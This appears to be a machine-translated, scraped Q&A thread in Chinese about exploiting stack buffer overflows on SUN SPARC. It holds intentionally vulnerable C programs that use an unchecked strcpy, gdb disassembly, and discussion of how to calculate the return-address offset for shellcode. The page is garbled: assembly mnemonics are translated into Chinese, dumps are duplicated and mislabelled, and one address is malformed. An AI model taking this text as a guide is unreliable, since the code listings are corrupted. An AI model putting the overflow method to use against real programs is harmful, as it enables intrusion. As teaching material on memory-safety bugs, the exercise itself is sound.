SUN Sparc上的堆栈溢出
但attack.c对server2的作用不同。知道为什么吗SUN Sparc上的堆栈溢出,c,sun,sparc,C,Sun,Sparc,但attack.c对server2的作用不同。知道为什么吗 /* server1.c */ /* compile: cc -o server1 server1.c */ void copy(const char *a){ char foo[400]; int i, j, k; strcpy(foo, a); i = 1; } void main(int argc, char *argv[]){ if(argc >=2 )copy( argv[1]
/* server1.c */
/* compile: cc -o server1 server1.c */
void copy(const char *a){
char foo[400];
int i, j, k;
strcpy(foo, a);
i = 1;
}
void main(int argc, char *argv[]){
if(argc >=2 )copy( argv[1] );
}
以下是server2.c的程序集:
/* server2.c */
/* compile: cc -o server2 server2.c */
void copy2( const char *a ){
char buf[200];
int i, j, k;
strcpy(buf,a);
i = 1;
}
void copy1(const char *a){
char foo[200];
int i, j, k;
copy2(a);
i = 1;
}
void main( int argc, char *argv[] ) {
if (argc >=2 )copy1( argv[1] );
}
(gdb)禁止复制2
函数copy2的汇编程序代码转储:
0x00010bd8:保存%sp,-304,%sp
0x00010bdc:添加%fp,-200,%o0
0x00010be0:调用0x20ce8
0x00010be4:mov%i0,%o1
0x00010be8:mov 1,%l0
0x00010bec:st%l0,[%fp+-204]
0x00010bf0:ret
0x00010bf4:还原
0x00010bf8:ret
0x00010bfc:还原
0x00010c00:illtrap 0x10000
0x00010c04:illtrap 0x10000
0x00010c08:illtrap 0x10000
0x00010c0c:illtrap 0x10000
汇编程序转储结束。
(gdb)disas copy1
函数copy1的汇编程序代码转储:
0x00010c10:保存%sp,-304,%sp
0x00010c14:调用0x10bd8
0x00010c18:mov%i0,%o0
0x00010c1c:mov 1,%l0
0x00010c20:st%l0,[%fp+-204]
0x00010c24:ret
0x00010c28:还原
0x00010c2c:ret
0x00010c30:还原
0x00010c34:illtrap 0x10000
0x00010c38:illtrap 0x10000
0x00010c3c:illtrap 0x10000
0x00010c40:illtrap 0x10000
0x00010c44:illtrap 0x10000
汇编程序转储结束。
(gdb)disas main
主功能的汇编程序代码转储:
0x00010c48:保存%sp,-96,%sp
0x00010c4c:cmp%i0,2
0x00010c50:bl 0x10c68
0x00010c54:否
0x00010c58:调用0x10c10
0x00010c5c:ld[%i1+4],%o0
0x00010c60:ret
0x00010c64:还原
0x00010c68:ret
0x00010c6c:还原
汇编程序转储结束。
对于server1.c:
(gdb) disas copy2
Dump of assembler code for function copy2:
0x00010bd8 <copy2+0>: save %sp, -304, %sp
0x00010bdc <copy2+4>: add %fp, -200, %o0
0x00010be0 <copy2+8>: call 0x20ce8 <strcpy@plt>
0x00010be4 <copy2+12>: mov %i0, %o1
0x00010be8 <copy2+16>: mov 1, %l0
0x00010bec <copy2+20>: st %l0, [ %fp + -204 ]
0x00010bf0 <copy2+24>: ret
0x00010bf4 <copy2+28>: restore
0x00010bf8 <copy2+32>: ret
0x00010bfc <copy2+36>: restore
0x00010c00 <copy2+40>: illtrap 0x10000
0x00010c04 <copy2+44>: illtrap 0x10000
0x00010c08 <copy2+48>: illtrap 0x10000
0x00010c0c <copy2+52>: illtrap 0x10000
End of assembler dump.
(gdb) disas copy1
Dump of assembler code for function copy1:
0x00010c10 <copy1+0>: save %sp, -304, %sp
0x00010c14 <copy1+4>: call 0x10bd8 <copy2>
0x00010c18 <copy1+8>: mov %i0, %o0
0x00010c1c <copy1+12>: mov 1, %l0
0x00010c20 <copy1+16>: st %l0, [ %fp + -204 ]
0x00010c24 <copy1+20>: ret
0x00010c28 <copy1+24>: restore
0x00010c2c <copy1+28>: ret
0x00010c30 <copy1+32>: restore
0x00010c34 <copy1+36>: illtrap 0x10000
0x00010c38 <copy1+40>: illtrap 0x10000
0x00010c3c <copy1+44>: illtrap 0x10000
0x00010c40 <copy1+48>: illtrap 0x10000
0x00010c44 <copy1+52>: illtrap 0x10000
End of assembler dump.
(gdb) disas main
Dump of assembler code for function main:
0x00010c48 <main+0>: save %sp, -96, %sp
0x00010c4c <main+4>: cmp %i0, 2
0x00010c50 <main+8>: bl 0x10c68 <main+32>
0x00010c54 <main+12>: nop
0x00010c58 <main+16>: call 0x10c10 <copy1>
0x00010c5c <main+20>: ld [ %i1 + 4 ], %o0
0x00010c60 <main+24>: ret
0x00010c64 <main+28>: restore
0x00010c68 <main+32>: ret
0x00010c6c <main+36>: restore
End of assembler dump.
(gdb)disas复制
函数副本的汇编程序代码转储:
0x00010bc0:保存%sp,-504,%sp
0x00010bc4:添加%fp,-400,%o0
0x00010bc8:调用0x20c98
0x00010bcc:mov%i0,%o1
0x00010bd0:mov 1,%l0
0x00010bd4:st%l0,[%fp+-404]
0x00010bd8:ret
0x00010bdc:还原
0x00010be0:ret
0x00010be4:还原
0x00010be8:illtrap 0x10000
0x00010bec:illtrap 0x10000
0x00010bf0:illtrap 0x10000
0x00010bf4:illtrap 0x10000
汇编程序转储结束。
(gdb)disas main
主功能的汇编程序代码转储:
0x00010bf8:保存%sp,-96,%sp
0x00010bfc:cmp%i0,2
0x00010C000:bl 0x10c18
0x00010c04:否
0x00010c08:调用0x10bc0
0x00010c0c:ld[%i1+4],%o0
0x00010c10:ret
0x00010c14:还原
0x00010c18:ret
0x00010c1c:还原
汇编程序转储结束。
我需要在attack.c中修改什么才能使其利用server2.c?可能编译器没有为
copy1()
中的foo[]
分配空间,因为它未使用。唯一确定的方法是查看生成的可执行文件汇编代码。pfff。。。最后
(gdb) disas copy
Dump of assembler code for function copy:
0x00010bc0 <copy+0>: save %sp, -504, %sp
0x00010bc4 <copy+4>: add %fp, -400, %o0
0x00010bc8 <copy+8>: call 0x20c98 <strcpy@plt>
0x00010bcc <copy+12>: mov %i0, %o1
0x00010bd0 <copy+16>: mov 1, %l0
0x00010bd4 <copy+20>: st %l0, [ %fp + -404 ]
0x00010bd8 <copy+24>: ret
0x00010bdc <copy+28>: restore
0x00010be0 <copy+32>: ret
0x00010be4 <copy+36>: restore
0x00010be8 <copy+40>: illtrap 0x10000
0x00010bec <copy+44>: illtrap 0x10000
0x00010bf0 <copy+48>: illtrap 0x10000
0x00010bf4 <copy+52>: illtrap 0x10000
End of assembler dump.
(gdb) disas main
Dump of assembler code for function main:
0x00010bf8 <main+0>: save %sp, -96, %sp
0x00010bfc <main+4>: cmp %i0, 2
0x00010c00 <main+8>: bl 0x10c18 <main+32>
0x00010c04 <main+12>: nop
0x00010c08 <main+16>: call 0x10bc0 <copy>
0x00010c0c <main+20>: ld [ %i1 + 4 ], %o0
0x00010c10 <main+24>: ret
0x00010c14 <main+28>: restore
0x00010c18 <main+32>: ret
0x00010c1c <main+36>: restore
End of assembler dump.
我以为偏移量是8,但它是200+8。根据我的理解,因为
copy2()
是被调用方,copy1()
是调用方,copy1
的堆栈帧低于copy2
,我们找到分配给foo和buff的字节总数,这给出了缓冲区的大小。然后,我们通过向buff的大小添加一个值来获得偏移值。这个值是通过计算被调用方调用缓冲区溢出指令的位置与调用方调用被调用方后的返回地址之间的地址差来获得的,因为这是我们引入shell代码的地方。
Buffsize+32+32-8编译器确实为foo[]分配了空间。我认为这是因为我们在编译时没有进行优化(这正是我想要的)。@user:如果你已经看过汇编程序,那么你会比这里的任何人都更清楚你的攻击失败的原因!谁否决了这个?根据现有的信息,这是一个合理的猜测。@OliCharlesworth不需要防御性。无论谁否决了你,都没有个人仇恨;每一次猜测的价值都取决于观点。最后,对于那个否决你的人,两个支持你,所以没有净损失。:)在我看来,指责那些投你反对票的人是不可接受的@桑斯塔:“不可接受”?对我来说,要求澄清反对票似乎很合理。。。
(gdb) disas copy
Dump of assembler code for function copy:
0x00010bc0 <copy+0>: save %sp, -504, %sp
0x00010bc4 <copy+4>: add %fp, -400, %o0
0x00010bc8 <copy+8>: call 0x20c98 <strcpy@plt>
0x00010bcc <copy+12>: mov %i0, %o1
0x00010bd0 <copy+16>: mov 1, %l0
0x00010bd4 <copy+20>: st %l0, [ %fp + -404 ]
0x00010bd8 <copy+24>: ret
0x00010bdc <copy+28>: restore
0x00010be0 <copy+32>: ret
0x00010be4 <copy+36>: restore
0x00010be8 <copy+40>: illtrap 0x10000
0x00010bec <copy+44>: illtrap 0x10000
0x00010bf0 <copy+48>: illtrap 0x10000
0x00010bf4 <copy+52>: illtrap 0x10000
End of assembler dump.
(gdb) disas main
Dump of assembler code for function main:
0x00010bf8 <main+0>: save %sp, -96, %sp
0x00010bfc <main+4>: cmp %i0, 2
0x00010c00 <main+8>: bl 0x10c18 <main+32>
0x00010c04 <main+12>: nop
0x00010c08 <main+16>: call 0x10bc0 <copy>
0x00010c0c <main+20>: ld [ %i1 + 4 ], %o0
0x00010c10 <main+24>: ret
0x00010c14 <main+28>: restore
0x00010c18 <main+32>: ret
0x00010c1c <main+36>: restore
End of assembler dump.
#define BUFSIZE 464
#define DUFSIZE 256